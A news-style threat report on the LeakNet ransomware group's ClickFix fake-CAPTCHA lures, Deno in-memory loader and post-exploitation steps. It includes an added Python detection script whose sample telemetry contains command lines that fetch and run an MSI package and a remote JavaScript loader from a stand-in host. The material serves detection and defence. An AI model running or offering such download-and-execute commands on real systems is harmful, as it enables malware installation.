LeakNet Ransomware Spreads via Hacked Sites, Deno Loader

The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic, using compromised websites as its initial access method. This marks a shift away from the traditional intrusion techniques the group relied on before.

ClickFix tricks users into pasting and running attacker-supplied commands themselves, believing they are fixing a non-existent system error or completing a verification step. For LeakNet this replaces older methods such as buying stolen credentials from initial access brokers.

Another key element of the attack is a staged command-and-control loader. It uses Deno, a legitimate JavaScript runtime, to execute malicious payloads directly in memory, which reduces the chances of detection by tools that rely on files written to disk.

Security researchers highlight that both attack paths follow a consistent pattern. This repeatable behavior helps defenders identify and stop attacks earlier. It provides clear detection opportunities before ransomware deployment.

LeakNet Adopts ClickFix for Initial Access

LeakNet first appeared in November 2024. The group described itself as a “digital watchdog” focused on internet transparency. However, it has targeted multiple industries, including industrial sectors.

Using ClickFix offers several operational advantages. It reduces reliance on third-party access providers and lowers attack costs. It also removes delays caused by waiting for stolen credentials.

In these attacks, compromised websites display fake CAPTCHA checks. The prompts instruct the user to open the Windows Run dialog and paste a command, such as an msiexec.exe invocation, that installs the attacker's package. Because the victim launches it, execution starts under the user's own account with no exploit required.

The attacks are not limited to specific industries. Instead, they target a wide range of victims. This broad approach increases the chances of successful infections.

Deno-Based Loader Enhances Stealth and Execution

Threat actors increasingly use ClickFix techniques. This method exploits trusted workflows to make malicious actions appear safe. Users often do not suspect anything unusual.

Security experts note this marks a strategic shift for LeakNet. By avoiding access brokers, the group can scale operations faster. Compromised websites also make detection more difficult.

LeakNet uses a Deno-based loader to execute encoded JavaScript in memory. Beyond the runtime binary itself, this leaves little evidence on disk and helps the attackers evade traditional file-based security tools.

The payload collects system information and connects to external servers. It then downloads additional malware in stages. This continuous process allows attackers to maintain control.


Post-Exploitation Tactics and Growing Ransomware Threats

In some cases, attackers also use phishing through Microsoft Teams. These attacks trick users into launching similar payload chains. This suggests the technique is spreading among threat groups.

After gaining access, LeakNet follows a structured attack process. It uses DLL side-loading, moves laterally with PsExec, and exfiltrates data. Finally, it encrypts systems for ransom.
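The three steps above (msiexec.exe launched from the Run dialog, a Deno stage executing remote or encoded script, and PsExec's service binary appearing on a second host) are exactly the repeatable behaviour the article says defenders can key on. The following is an added detection example, not code from the page or from any LeakNet tooling: it runs over constructed Sysmon Event ID 1 style process-creation records. The command lines, host names and the assumption that the Deno stage uses `run` or `eval` are illustrative; the page does not give the real ones.

```python
"""Added detection example (not code from the page or from LeakNet's tooling).

Walks Sysmon Event ID 1 style process-creation records and flags the three
repeatable steps the article describes: msiexec.exe launched from the Run
dialog with a remote package, a deno.exe stage pulling or decoding script,
and PsExec's service binary on a second host. The command lines below are
constructed for illustration; the real ones are not on the page."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# 40+ base64 characters in one run: a crude proxy for an embedded encoded script.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def rule_clickfix_msiexec(ev: ProcEvent) -> bool:
    """Run dialog launches are children of explorer.exe; a normal local
    install does not point msiexec at a URL."""
    return (_basename(ev.image) == "msiexec.exe"
            and _basename(ev.parent_image) == "explorer.exe"
            and URL_RE.search(ev.command_line) is not None)


def rule_deno_loader(ev: ProcEvent) -> bool:
    """deno.exe executing a remote module or an inline/encoded script.
    The 'run'/'eval' usage is an assumption; the page only says encoded
    JavaScript is executed in memory."""
    if _basename(ev.image) != "deno.exe":
        return False
    cl = ev.command_line
    uses_exec = re.search(r"\b(run|eval)\b", cl, re.IGNORECASE) is not None
    return uses_exec and (URL_RE.search(cl) is not None
                          or "atob(" in cl
                          or B64_RE.search(cl) is not None)


def rule_psexec_service(ev: ProcEvent) -> bool:
    """PsExec drops and starts PSEXESVC.exe on the target host."""
    return _basename(ev.image) == "psexesvc.exe"


RULES = {
    "clickfix_msiexec_remote_url": rule_clickfix_msiexec,
    "deno_remote_or_encoded_script": rule_deno_loader,
    "psexec_service_binary": rule_psexec_service,
}


def detect(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Return one alert per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                alerts.append({"rule": name, "host": ev.host,
                               "command_line": ev.command_line})
    return alerts


def chained_hosts(events: List[ProcEvent]) -> List[str]:
    """Hosts where the ClickFix msiexec step and the Deno stage both fire:
    the two-step pattern the article calls a pre-ransomware detection point."""
    seen: Dict[str, set] = {}
    for a in detect(events):
        seen.setdefault(a["host"], set()).add(a["rule"])
    needed = {"clickfix_msiexec_remote_url", "deno_remote_or_encoded_script"}
    return sorted(h for h, rules in seen.items() if needed <= rules)


# Constructed sample telemetry, not captured data.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://cdn.example.invalid/verify.msi /qn"),
    ProcEvent("WS01", r"C:\Windows\System32\msiexec.exe",
              r"C:\Users\u\AppData\Local\deno\deno.exe",
              "deno.exe run --allow-all https://cdn.example.invalid/loader.js"),
    ProcEvent("WS02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\u\Downloads\7z.msi"),  # benign local install
    ProcEvent("SRV03", r"C:\Windows\System32\services.exe", r"C:\Windows\PSEXESVC.exe",
              r"C:\Windows\PSEXESVC.exe"),
    ProcEvent("WS04", r"C:\Windows\System32\cmd.exe", r"C:\tools\deno.exe",
              'deno.exe eval "eval(atob(\'Y29uc29sZS5sb2coJ3N0YWdlIDInKTs=\'))"'),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['host']:6} {a['rule']:32} {a['command_line']}")
    print("ClickFix->Deno chain on:", chained_hosts(SAMPLE_EVENTS))
```

The per-event rules are deliberately narrow so that a local msiexec install from the Run dialog (WS02 in the sample) does not alert; the value comes from `chained_hosts`, which escalates only when the lure step and the in-memory stage appear on the same host, which is the point in the chain the article says is still before lateral movement and encryption.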

The group also runs built-in system commands to enumerate which accounts and credentials are already active on the host. Reusing what is already present lets the attackers move quickly without having to obtain new access.

For data exfiltration, LeakNet uses cloud storage such as S3 buckets, so that the outbound transfer blends in with legitimate cloud traffic and is less likely to be flagged by network security controls.

Recent reports show ransomware activity remains strong. Groups like Qilin, Akira, and Cl0p continue to dominate. However, attackers are shifting toward targeting smaller organizations at scale.
